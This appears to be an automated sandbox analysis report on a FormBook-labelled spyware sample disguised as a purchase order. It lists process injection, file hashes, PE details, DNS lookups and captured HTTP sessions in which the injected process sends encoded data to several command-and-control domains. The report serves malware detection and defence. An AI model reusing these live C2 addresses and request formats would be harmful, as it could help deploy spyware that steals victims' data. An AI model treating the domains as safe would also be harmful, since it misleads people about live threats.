                Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
                Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement
                Behavior Graph ID: 1567398 | Sample: Purchase Order..exe | Startdate: 03/12/2024 | Architecture: WINDOWS | Score: 100
                Process chain: Purchase Order..exe (started) -> Purchase Order..exe (started) -> jfBrBcvTIMPfDU.exe (injected) -> isoburn.exe (started) -> jfBrBcvTIMPfDU.exe (injected) and firefox.exe (started)
                Dropped file: C:\Users\user\...\Purchase Order..exe.log, ASCII
                Network (from the second injected jfBrBcvTIMPfDU.exe): cyperla.xyz 31.186.11.114, 49714, 80 BETAINTERNATIONALTR Turkey; www.madhf.tech 103.224.182.242, 49722, 49723, 49724 TRELLIAN-AS-APTrellianPtyLimitedAU Australia; 3 other IPs or domains

                Source | Detection | Scanner | Label
                Purchase Order..exe | 55% | ReversingLabs | ByteCode-MSIL.Backdoor.FormBook
                Purchase Order..exe | 100% | Joe Sandbox ML |
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                Source | Detection | Scanner | Label
                http://www.bser101pp.buzz/v89f/?MVWd=vR3kWP+v98PFeIQX6HbJh3lQDWTjSRYryWjHUGMo4+T5xi8TnNV+jgD2+4ag3QdSrCwOZVBfu0hve5I79B9k2NYglVjUbXXrY07zMLLi7rmhcEJnvkrNOok7dcSq1J6Z3g==&kfm=dFj0Olb | 0% | Avira URL Cloud | safe
                http://www.goldstarfootwear.shop/8m07/ | 0% | Avira URL Cloud | safe
                https://www.cstrategy.online/qx5d/?MVWd=IyUQrkKyuirfHSYtNcNb8FX1VMdObdd7C0LSkI7uCAGWAT/RC | 0% | Avira URL Cloud | safe
                http://www.madhf.tech/6ou6/?MVWd=We72k2U8RqyHNx9c0lgrcMajP+7PydPnCau05KQMUjWmq73IzupFdRGddnmXCSRdMUrkGKdQ0AHY8jBIUc/t5Q/485VI7OI/8adtFmnjL5G+X4c0GC9YevItAMgBvFKG4A==&kfm=dFj0Olb | 0% | Avira URL Cloud | safe
                http://www.cstrategy.online/qx5d/ | 0% | Avira URL Cloud | safe
                http://www.madhf.tech/6ou6/ | 0% | Avira URL Cloud | safe
                http://www.goldstarfootwear.shop | 0% | Avira URL Cloud | safe
                http://www.bser101pp.buzz/v89f/ | 0% | Avira URL Cloud | safe
                http://www.cyperla.xyz/qygv/?MVWd=PNgLNtFNavTWVACj/R5fAEIERpwPFUn3Y2lvnmQ+PypmeASZv9aNxFxhHJqyS8bM8Pjr3wsa5/scE4diKg4WmoCRaQ8OoRB1M8xsODg9Mufe/exe8zzsMcFcs0FiYc3z1g==&kfm=dFj0Olb | 0% | Avira URL Cloud | safe
                http://www.madhf.tech/6ou6/?MVWd=We72k2U8RqyHNx9c0lgrcMajP | 0% | Avira URL Cloud | safe
                Name | IP | Active | Malicious | Antivirus Detection | Reputation
                goldstarfootwear.shop | 3.33.130.190 | true | false | | unknown
                cstrategy.online | 194.76.119.60 | true | false | | unknown
                www.madhf.tech | 103.224.182.242 | true | false | | high
                cyperla.xyz | 31.186.11.114 | true | true | | unknown
                www.bser101pp.buzz | 188.114.96.6 | true | false | | high
                www.cstrategy.online | unknown | unknown | false | | unknown
                www.goldstarfootwear.shop | unknown | unknown | false | | unknown
                www.cyperla.xyz | unknown | unknown | true | | unknown
                                Name | Malicious | Antivirus Detection | Reputation
                                http://www.madhf.tech/6ou6/?MVWd=We72k2U8RqyHNx9c0lgrcMajP+7PydPnCau05KQMUjWmq73IzupFdRGddnmXCSRdMUrkGKdQ0AHY8jBIUc/t5Q/485VI7OI/8adtFmnjL5G+X4c0GC9YevItAMgBvFKG4A==&kfm=dFj0Olb | false | Avira URL Cloud: safe | unknown
                                http://www.bser101pp.buzz/v89f/?MVWd=vR3kWP+v98PFeIQX6HbJh3lQDWTjSRYryWjHUGMo4+T5xi8TnNV+jgD2+4ag3QdSrCwOZVBfu0hve5I79B9k2NYglVjUbXXrY07zMLLi7rmhcEJnvkrNOok7dcSq1J6Z3g==&kfm=dFj0Olb | false | Avira URL Cloud: safe | unknown
                                http://www.goldstarfootwear.shop/8m07/ | false | Avira URL Cloud: safe | unknown
                                http://www.bser101pp.buzz/v89f/ | false | Avira URL Cloud: safe | unknown
                                http://www.madhf.tech/6ou6/ | false | Avira URL Cloud: safe | unknown
                                http://www.cstrategy.online/qx5d/ | false | Avira URL Cloud: safe | unknown
                                http://www.cyperla.xyz/qygv/?MVWd=PNgLNtFNavTWVACj/R5fAEIERpwPFUn3Y2lvnmQ+PypmeASZv9aNxFxhHJqyS8bM8Pjr3wsa5/scE4diKg4WmoCRaQ8OoRB1M8xsODg9Mufe/exe8zzsMcFcs0FiYc3z1g==&kfm=dFj0Olb | false | Avira URL Cloud: safe | unknown
                                Name | Source | Malicious | Antivirus Detection | Reputation
                                https://ac.ecosia.org/autocomplete?q= | isoburn.exe, 00000006.00000003.2024861580.0000000007C98000.00000004.00000020.00020000.00000000.sdmp | false | | high
                                https://duckduckgo.com/chrome_newtab | isoburn.exe, 00000006.00000003.2024861580.0000000007C98000.00000004.00000020.00020000.00000000.sdmp | false | | high
                                https://duckduckgo.com/ac/?q= | isoburn.exe, 00000006.00000003.2024861580.0000000007C98000.00000004.00000020.00020000.00000000.sdmp | false | | high
                                https://www.google.com/images/branding/product/ico/googleg_lodp.ico | isoburn.exe, 00000006.00000003.2024861580.0000000007C98000.00000004.00000020.00020000.00000000.sdmp | false | | high
                                https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | isoburn.exe, 00000006.00000003.2024861580.0000000007C98000.00000004.00000020.00020000.00000000.sdmp | false | | high
                                https://www.cstrategy.online/qx5d/?MVWd=IyUQrkKyuirfHSYtNcNb8FX1VMdObdd7C0LSkI7uCAGWAT/RC | isoburn.exe, 00000006.00000002.2663245910.0000000005426000.00000004.10000000.00040000.00000000.sdmp, jfBrBcvTIMPfDU.exe, 00000009.00000002.2662205825.0000000003286000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | isoburn.exe, 00000006.00000003.2024861580.0000000007C98000.00000004.00000020.00020000.00000000.sdmp | false | | high
                                http://localhost/arkanoid_server/requests.php | isoburn.exe, 00000006.00000002.2663245910.0000000004EAC000.00000004.10000000.00040000.00000000.sdmp, jfBrBcvTIMPfDU.exe, 00000009.00000002.2662205825.0000000002D0C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.2130259016.000000003C42C000.00000004.80000000.00040000.00000000.sdmp, Purchase Order..exe | false | | high
                                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | isoburn.exe, 00000006.00000003.2024861580.0000000007C98000.00000004.00000020.00020000.00000000.sdmp | false | | high
                                https://www.ecosia.org/newtab/ | isoburn.exe, 00000006.00000003.2024861580.0000000007C98000.00000004.00000020.00020000.00000000.sdmp | false | | high
                                http://www.goldstarfootwear.shop | jfBrBcvTIMPfDU.exe, 00000009.00000002.2661409354.00000000027A5000.00000040.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                                http://www.madhf.tech/6ou6/?MVWd=We72k2U8RqyHNx9c0lgrcMajP | jfBrBcvTIMPfDU.exe, 00000009.00000002.2662205825.0000000003418000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | isoburn.exe, 00000006.00000003.2024861580.0000000007C98000.00000004.00000020.00020000.00000000.sdmp | false | | high
                                                    IP | Domain | Country | ASN | ASN Name | Malicious
                                                    188.114.96.6 | www.bser101pp.buzz | European Union | 13335 | CLOUDFLARENETUS | false
                                                    31.186.11.114 | cyperla.xyz | Turkey | 199484 | BETAINTERNATIONALTR | true
                                                    103.224.182.242 | www.madhf.tech | Australia | 133618 | TRELLIAN-AS-APTrellianPtyLimitedAU | false
                                                    194.76.119.60 | cstrategy.online | Italy | 202675 | KELIWEBIT | false
                                                    3.33.130.190 | goldstarfootwear.shop | United States | 8987 | AMAZONEXPANSIONGB | false
                                                    Joe Sandbox version:41.0.0 Charoite
                                                    Analysis ID:1567398
                                                    Start date and time:2024-12-03 14:24:37 +01:00
                                                    Joe Sandbox product:CloudBasic
                                                    Overall analysis duration:0h 8m 37s
                                                    Hypervisor based Inspection enabled:false
                                                    Report type:full
                                                    Cookbook file name:default.jbs
                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                    Number of analysed new started processes analysed:11
                                                    Number of new started drivers analysed:0
                                                    Number of existing processes analysed:0
                                                    Number of existing drivers analysed:0
                                                    Number of injected processes analysed:2
                                                    Technologies:
                                                    • HCA enabled
                                                    • EGA enabled
                                                    • AMSI enabled
                                                    Analysis Mode:default
                                                    Analysis stop reason:Timeout
                                                    Sample name:Purchase Order..exe
                                                    Detection:MAL
                                                    Classification:mal100.troj.spyw.evad.winEXE@7/2@7/5
                                                    EGA Information:
                                                    • Successful, ratio: 75%
                                                    HCA Information:
                                                    • Successful, ratio: 96%
                                                    • Number of executed functions: 102
                                                    • Number of non-executed functions: 302
                                                    Cookbook Comments:
                                                    • Found application associated with file extension: .exe
                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                    • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                    • Execution Graph export aborted for target jfBrBcvTIMPfDU.exe, PID 5568 because it is empty
                                                    • Not all processes where analyzed, report is missing behavior information
                                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                                    • VT rate limit hit for: Purchase Order..exe
                                                    Time | Type | Description
                                                    08:25:33 | API Interceptor | 1x Sleep call for process: Purchase Order..exe modified
                                                    08:26:52 | API Interceptor | 1008648x Sleep call for process: isoburn.exe modified
                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          No context
                                                          No context
                                                          Process:C:\Users\user\Desktop\Purchase Order..exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):1216
                                                          Entropy (8bit):5.34331486778365
                                                          Encrypted:false
                                                          SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                          MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                          SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                          SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                          SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                          Malicious:true
                                                          Reputation:high, very likely benign file
                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                          Process:C:\Windows\SysWOW64\isoburn.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                          Category:dropped
                                                          Size (bytes):196608
                                                          Entropy (8bit):1.1209886597424439
                                                          Encrypted:false
                                                          SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8QbnVcxjONC4Je5Q:r2qOB1nxCkvSAELyKOMq+8QTQKC+
                                                          MD5:EFD26666EAE0E87B32082FF52F9F4C5E
                                                          SHA1:603BFE6A7D6C0EC4B8BA1D38AEA6EFADDC42B5E0
                                                          SHA-256:67D4CAA4255418EB18873F01597D1F4257C4146D1DCED78E26D5FD76B783F416
                                                          SHA-512:28ADD7B8D88795F191567FD029E9F8BC9AEF7584CE3CD56DB40BBA52BC8335F2D8E53A5CE44C153C13A31FD0BE1D76D1E558A4AA5987D5456C000C4D64F08EAA
                                                          Malicious:false
                                                          Reputation:moderate, very likely benign file
Preview:SQLite format 3
                                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Entropy (8bit):7.807336323885174
                                                          TrID:
                                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                          • Win32 Executable (generic) a (10002005/4) 49.78%
                                                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                          • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                                          File name:Purchase Order..exe
                                                          File size:766'976 bytes
                                                          MD5:ecb3a0578fe97356ed12da57bc6bbc36
                                                          SHA1:6dff87fc845846f7ea2a03d0b5eff42b8fbc9f86
                                                          SHA256:469bf1df653a45070717d7c7121dfb3cdd3ccd150f3182ff399a012dc5c95de7
                                                          SHA512:094000115e77fd364ee1fcf39a98796f9fc52166e0e7caf095cd7192e56bb7bef49738ade31a996968afceed01ededb969da668ed112971a98a3ec951b299970
                                                          SSDEEP:12288:QCIR4R52J+XtGPu5FmroVa84u1jK15YHXFFEMuaVp1zqKb9cj0C8YxwbIRi:HIeeHUFmr+wJEHXFbbVp1z5pE01HbI4
                                                          TLSH:93F412A85A56E416CB4153350EB2F2B957BC4FEEE90093538FDEAEEBF93AC145C40181
                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....iNg..............0..\...T......Zx... ........@.. ....................................@................................
                                                          Icon Hash:033424c4c199d839
                                                          Entrypoint:0x4b785a
                                                          Entrypoint Section:.text
                                                          Digitally signed:false
                                                          Imagebase:0x400000
                                                          Subsystem:windows gui
                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                          Time Stamp:0x674E69DE [Tue Dec 3 02:15:58 2024 UTC]
                                                          TLS Callbacks:
                                                          CLR (.Net) Version:
                                                          OS Version Major:4
                                                          OS Version Minor:0
                                                          File Version Major:4
                                                          File Version Minor:0
                                                          Subsystem Version Major:4
                                                          Subsystem Version Minor:0
                                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                          Instruction
                                                          jmp dword ptr [00402000h]
                                                          add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xb7808 | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xb8000 | 0x4ca8 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xbe000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0xb5860 | 0xb5c00 | 75e2a0acf4d33cd9f0fe409065027fd3 | False | 0.938498054934663 | data | 7.816664771480419 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0xb8000 | 0x4ca8 | 0x5000 | bd0c55937870d93130855f05ad818c74 | False | 0.917626953125 | data | 7.667223138106899 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xbe000 | 0xc | 0x400 | f7dc40ca0f0053ad1ceee1ab206b3fcc | False | 0.025390625 | data | 0.05585530805374581 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xb8100 | 0x46f9 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 0.9932852661126094
RT_GROUP_ICON | 0xbc80c | 0x14 | data | | | 1.05
RT_VERSION | 0xbc830 | 0x278 | data | | | 0.46677215189873417
RT_MANIFEST | 0xbcab8 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 3, 2024 14:26:29.206685066 CET | 192.168.2.8 | 1.1.1.1 | 0xb1a | Standard query (0) | www.cyperla.xyz | A (IP address) | IN (0x0001) | false
Dec 3, 2024 14:26:46.433046103 CET | 192.168.2.8 | 1.1.1.1 | 0xcdca | Standard query (0) | www.cstrategy.online | A (IP address) | IN (0x0001) | false
Dec 3, 2024 14:26:47.429888964 CET | 192.168.2.8 | 1.1.1.1 | 0xcdca | Standard query (0) | www.cstrategy.online | A (IP address) | IN (0x0001) | false
Dec 3, 2024 14:27:02.340909958 CET | 192.168.2.8 | 1.1.1.1 | 0xb227 | Standard query (0) | www.madhf.tech | A (IP address) | IN (0x0001) | false
Dec 3, 2024 14:27:03.354394913 CET | 192.168.2.8 | 1.1.1.1 | 0xb227 | Standard query (0) | www.madhf.tech | A (IP address) | IN (0x0001) | false
Dec 3, 2024 14:27:18.082979918 CET | 192.168.2.8 | 1.1.1.1 | 0xfedd | Standard query (0) | www.bser101pp.buzz | A (IP address) | IN (0x0001) | false
Dec 3, 2024 14:27:33.066659927 CET | 192.168.2.8 | 1.1.1.1 | 0x16c7 | Standard query (0) | www.goldstarfootwear.shop | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 3, 2024 14:26:29.863993883 CET | 1.1.1.1 | 192.168.2.8 | 0xb1a | No error (0) | www.cyperla.xyz | cyperla.xyz | | CNAME (Canonical name) | IN (0x0001) | false
Dec 3, 2024 14:26:29.863993883 CET | 1.1.1.1 | 192.168.2.8 | 0xb1a | No error (0) | cyperla.xyz | | 31.186.11.114 | A (IP address) | IN (0x0001) | false
Dec 3, 2024 14:26:47.770526886 CET | 1.1.1.1 | 192.168.2.8 | 0xcdca | No error (0) | www.cstrategy.online | cstrategy.online | | CNAME (Canonical name) | IN (0x0001) | false
Dec 3, 2024 14:26:47.770526886 CET | 1.1.1.1 | 192.168.2.8 | 0xcdca | No error (0) | cstrategy.online | | 194.76.119.60 | A (IP address) | IN (0x0001) | false
Dec 3, 2024 14:26:47.770540953 CET | 1.1.1.1 | 192.168.2.8 | 0xcdca | No error (0) | www.cstrategy.online | cstrategy.online | | CNAME (Canonical name) | IN (0x0001) | false
Dec 3, 2024 14:26:47.770540953 CET | 1.1.1.1 | 192.168.2.8 | 0xcdca | No error (0) | cstrategy.online | | 194.76.119.60 | A (IP address) | IN (0x0001) | false
Dec 3, 2024 14:27:03.638592958 CET | 1.1.1.1 | 192.168.2.8 | 0xb227 | No error (0) | www.madhf.tech | | 103.224.182.242 | A (IP address) | IN (0x0001) | false
Dec 3, 2024 14:27:03.639496088 CET | 1.1.1.1 | 192.168.2.8 | 0xb227 | No error (0) | www.madhf.tech | | 103.224.182.242 | A (IP address) | IN (0x0001) | false
Dec 3, 2024 14:27:18.365046024 CET | 1.1.1.1 | 192.168.2.8 | 0xfedd | No error (0) | www.bser101pp.buzz | | 188.114.96.6 | A (IP address) | IN (0x0001) | false
Dec 3, 2024 14:27:18.365046024 CET | 1.1.1.1 | 192.168.2.8 | 0xfedd | No error (0) | www.bser101pp.buzz | | 188.114.97.6 | A (IP address) | IN (0x0001) | false
Dec 3, 2024 14:27:33.366341114 CET | 1.1.1.1 | 192.168.2.8 | 0x16c7 | No error (0) | www.goldstarfootwear.shop | goldstarfootwear.shop | | CNAME (Canonical name) | IN (0x0001) | false
Dec 3, 2024 14:27:33.366341114 CET | 1.1.1.1 | 192.168.2.8 | 0x16c7 | No error (0) | goldstarfootwear.shop | | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Dec 3, 2024 14:27:33.366341114 CET | 1.1.1.1 | 192.168.2.8 | 0x16c7 | No error (0) | goldstarfootwear.shop | | 15.197.148.33 | A (IP address) | IN (0x0001) | false

                                                          • www.cyperla.xyz
                                                          • www.cstrategy.online
                                                          • www.madhf.tech
                                                          • www.bser101pp.buzz
                                                          • www.goldstarfootwear.shop
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.8 | 49714 | 31.186.11.114 | 80 | 516 | C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exe

Timestamp | Bytes transferred | Direction | Data
Dec 3, 2024 14:26:30.000993013 CET | 364 | OUT | GET /qygv/?MVWd=PNgLNtFNavTWVACj/R5fAEIERpwPFUn3Y2lvnmQ+PypmeASZv9aNxFxhHJqyS8bM8Pjr3wsa5/scE4diKg4WmoCRaQ8OoRB1M8xsODg9Mufe/exe8zzsMcFcs0FiYc3z1g==&kfm=dFj0Olb HTTP/1.1
                                                          Host: www.cyperla.xyz
                                                          Accept: */*
                                                          Accept-Language: en-us
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
Dec 3, 2024 14:26:31.382671118 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                          Connection: close
                                                          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                          pragma: no-cache
                                                          content-type: text/html
                                                          content-length: 1251
                                                          date: Tue, 03 Dec 2024 13:26:31 GMT
                                                          server: LiteSpeed
                                                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0
Dec 3, 2024 14:26:31.382713079 CET | 253 | IN |
Data Ascii: 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></bod


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.8 | 49716 | 194.76.119.60 | 80 | 516 | C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exe

Timestamp | Bytes transferred | Direction | Data
Dec 3, 2024 14:26:47.969553947 CET | 637 | OUT | POST /qx5d/ HTTP/1.1
                                                          Host: www.cstrategy.online
                                                          Accept: */*
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-us
                                                          Origin: http://www.cstrategy.online
                                                          Content-Length: 205
                                                          Connection: close
                                                          Cache-Control: no-cache
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Referer: http://www.cstrategy.online/qx5d/
                                                          User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                          Data Ascii: MVWd=Fw8woR6UyQnFDxd1bulT4k7DVOIfae5jPHzMwrn9HDGCVBu+D5bpLBstQqWhB3ylhFNx/Ibk/UD98GsdRmOvpJPXT+FRp5itm7wvOFyF+K+3GjZ20LnehvMjU3/xDkPCXpWMOl0Au9IQEwatdQyGetR0N6ncdFJeYxc1Xyw7yUGJOR3Wyefkbj6Kfwsot5ZIeuhp/8I=
                                                          Dec 3, 2024 14:26:49.226069927 CET | 391 | IN | HTTP/1.1 301 Moved Permanently
                                                          Server: nginx/1.18.0 (Ubuntu)
                                                          Date: Tue, 03 Dec 2024 13:26:49 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 178
                                                          Connection: close
                                                          Location: https://www.cstrategy.online/qx5d/
                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          2 | 192.168.2.8 | 49717 | 194.76.119.60 | 80 | 516 | C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Dec 3, 2024 14:26:50.630589008 CET | 657 | OUT | POST /qx5d/ HTTP/1.1
                                                          Host: www.cstrategy.online
                                                          Accept: */*
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-us
                                                          Origin: http://www.cstrategy.online
                                                          Content-Length: 225
                                                          Connection: close
                                                          Cache-Control: no-cache
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Referer: http://www.cstrategy.online/qx5d/
                                                          User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                          Data Ascii: MVWd=Fw8woR6UyQnFDQt1dJxT/E7ML+IfPu5ZPHPMwqzXH22CQQe+E4bpIBstfKWkcHzIhFR5/J3k/UX98DIdRRysoZPVaeFTnZitm7wvOBav+OS3FTp20qndoPMgdX/xJEP4XpWyOkpdu/AQEwqtdhyHVtRyHanITk4ACSQ1bDY5tWWULnG8o8XiYjShfzEeoOEgENxZhresr0v8LUg680rrf6ZXiQvD
                                                          Dec 3, 2024 14:26:51.983278990 CET | 391 | IN | HTTP/1.1 301 Moved Permanently
                                                          Server: nginx/1.18.0 (Ubuntu)
                                                          Date: Tue, 03 Dec 2024 13:26:51 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 178
                                                          Connection: close
                                                          Location: https://www.cstrategy.online/qx5d/
                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          3 | 192.168.2.8 | 49718 | 194.76.119.60 | 80 | 516 | C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Dec 3, 2024 14:26:53.286070108 CET | 1674 | OUT | POST /qx5d/ HTTP/1.1
                                                          Host: www.cstrategy.online
                                                          Accept: */*
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-us
                                                          Origin: http://www.cstrategy.online
                                                          Content-Length: 1241
                                                          Connection: close
                                                          Cache-Control: no-cache
                                                          Content-Type: application/x-www-form-urlencoded
